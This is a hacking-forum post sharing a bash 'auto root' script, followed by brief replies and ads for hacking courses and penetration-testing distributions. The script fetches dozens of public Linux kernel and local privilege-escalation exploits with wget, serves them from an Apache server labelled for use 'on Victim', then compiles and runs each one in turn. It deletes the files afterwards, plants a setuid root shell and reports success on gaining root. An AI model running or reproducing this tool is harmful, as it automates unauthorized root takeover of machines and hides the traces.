          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Edited by dEEpEst
      No emails in public

      Share this post


      Link to post
      Share on other sites
      10 hours ago, bash818 said:

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Its a jabber..

      Share this post


      Link to post
      Share on other sites
      hace 2 horas, bash818 dijo:

      Its a jabber..

      @bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
      You should know the rules.:close_tema:

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.

      • Similar Content

        • By dEEpEst
          Complete Basic Course Of Kali Linux

          Course Topics

          Introduction To Hacking
          Create a Virtual machine Environment
          Use Kali Linux & Network Security
          Updating Repositories and Installing Virtualbox addition Tools
          Installing Kali in VMWARE Workstation + Google advance Searching
          Find people online and learn Kali Command
          What is Cookies Operating system and how to install VMware
          What is Keylogger and How To Use Linux Directories Terminals
          Use RAT by Kali Linux Commands
          Become Anonymous Online TOR VPN Proxy and Linux command
          Hack a website with Havji Using Kali Linux
          use Proxychains on Kali Linux
          Configure VPN And DNS
          MacChanger On Kali Linux Repeat Proxychains
          Use NMAP
          Use GeoIP
          Introduction to Wireless and Debian
          Sniff And Windows Tools Cain-and- Able
          Protocol Administration Tools RAT
          Learn about Wireless Terminology

          LINK-
          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Introduction
          Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X, you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu, Debian etc.
          Tool-X v2.1 added new tools and lost of new updates.
          Alpine linux support.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Onex
          “onex a hacking tools library.” Onex is a Kali Linux hacking tools installer for termux and other Linux distribution. It’s package manager for hackers. onex manages large numbers of hacking tools that can be installed on a single click. Using onex, you can install all hacking tools in Termux and other Linux based distributions. onex can install more than 370+ Kali Linux hacking tools. use onex install [tool_name] command to install any hacking tool.
          onex works on any of the following operating systems:
              Android (Using the Termux App)
              Linux (Linux Based Systems)
          How to use onex ?
          CLI Mode :
          onex -h or onex help for help.
          Options :
              onex install [tool_name] install any tool.
              onex -i [tool_name] install any tool.
              onex search [tool_name] search any tool.
              onex -s [tool_name] search any tool.
              onex list list all tools.
              onex list -a list all tools.
              onex -l list all tools.
              onex -l -a list all tools.
              onex help get help.
              onex -h get help.
          Menu Mode :
          onex start to start onex menu mode.
          Enter a Number for a specific output:
              (1) : To show all available tools and type the number of a tool which you want to install.
              (2) : To show tools category.
              (3) : If you want to update onex.
              (4) : If you want to know About Us.
              (5) : To exit the tool.


          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe
          Linux Kodachi operating system is based on Debian 9.5 Xbuntu 18.04 LTS, that it will provide you with a secure, anti-forensic, an anonymous operating system considering all features that a person who is concerned about privacy would need to have in order to be secure.
          Kodachi is very easy to use all you have to do is boot it up on your PC via USB drive then you should have a fully running operating system with established VPN connection + Tor Connection established + DNScrypt service running. No setup or Linux knowledge is required from your side we do it all for you. The entire OS is functional from your temporary memory RAM so once you shut it down no trace is left behind all your activities are wiped out.
          Kodachi is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity and helps you to:

          Hidden Content
          Give reaction to this post to see the hidden content.     Use the Internet anonymously.
              All connections to the Internet are forced to go through the VPN then Tor network with DNS encryption.
              Leave no trace on the computer you are using unless you ask it explicitly.
              Use state-of-the-art cryptographic and privacy tools to encrypt your files, emails and instant messaging.
          Kodachi is based on the solid Linux Debian with customized XFCE this makes Kodachi stable, secure, and unique.
          Changelog v7.1
              + Kernel upgrade from 5.0.0-27 to 5.4.0-26
              + Added FDN DNS
              + Added Next DNS
              + Added Cloudflare Family malware and adult content filtering
              + Added Neustar Family malware and adult content filtering
              + Added exfat file system support
              + Added Enigmail plugin for Thunderbird
              + Added Tilix
              + Added USBGuard
              + Added USBKill
              + Added proxychains
              + Concky improved new display items like Torrify ip/country and font size
              + Added MPV player
              + Added new options to Ip source control and sys logs scripts
              – Jaxx wallet remove
              – Exoduse wallet removed
              – Xelcore wallet removed
              – Bisq exchange removed
              – Tox chat removed
              – Ring chat removed
              – VLC removed
              – Full system update
              – Removed Tenta and Fourth estate DNS / slow and dead
              – Kodachi browser changes
              – DuckDuckGo plugin removed
              – Disable JavaScript removed
              – BP Privacy Block All Font and Glyph Detection replaced WITH trace
              – Canvas Defender replaced WITH trace
              – Canvas Blocker replaced WITH trace
              – AudioContext Fingerprint Defender replaced WITH trace
              – Adnauseam added
              – uBlock Origin replaced WITH Nano Adblocker
              – CSS Exfil Protection Added
              – HTTPZ Added
              – Privacy Badger and Privacy Possum removed
              – Added Buster
              – Discord link added
              – MYKI plugin added
              – anonymousspeech link added to mails
              – ctemplar.com link added to mails
              – restoreprivacy link added to privacy bucket
              – Added get.webgl.org to Security check to test WebGl
              – Added WebGL Fingerprint Defender plugin
              – Public IP Display replaced with My Public IP plugin
              – Kodachi settings json added to browser
              ! Fixed VPN <-> Torrify to VPN -> Torrify on screen score status
              ! Fixed i2p now is working
              ! Proton VPN moved to location 5 of VPN lists
              ! Fixed light browser spelling mistake
              ! Fixed Bisq wrong place on XFCE menu
              ! Fixed onion sites not working with Kodachi browser
              ! All scripts have been changed and improved to work with json
              ! All settings were moved to a single file json
              ! Casper,dkms and geoip were updated from latest Ubuntu release with kernal

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. The repository contains 2428 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.
          BlackArch Linux is an open-source distribution of Linux derived from the lightweight and powerful Arch Linux operating system and designed from the ground up to be used by security professionals for penetration testing tasks.
          ChangeLog 2020.06.01:
              added more than 150 new tools
              disabled iptables/ip6tables service
              remove unneeded virtualbox services (drag’n’drop, vmsvga-x11)
              replace wicd with wifi-radar (gui) and wifi-menu (curses -> netctl)
              updated blackarch-installer to v1.1.45
              included linux kernel 5.6.14
              QA’ed and fixed a lot of packages (runtime exec, missing dependencies)
              updated all vim plugins and improved vim config options
              updated all blackarch tools and packages including config files
              updated all system packages
              updated all window manager menus (awesome, fluxbox, openbox)

          Hidden Content
          Give reaction to this post to see the hidden content.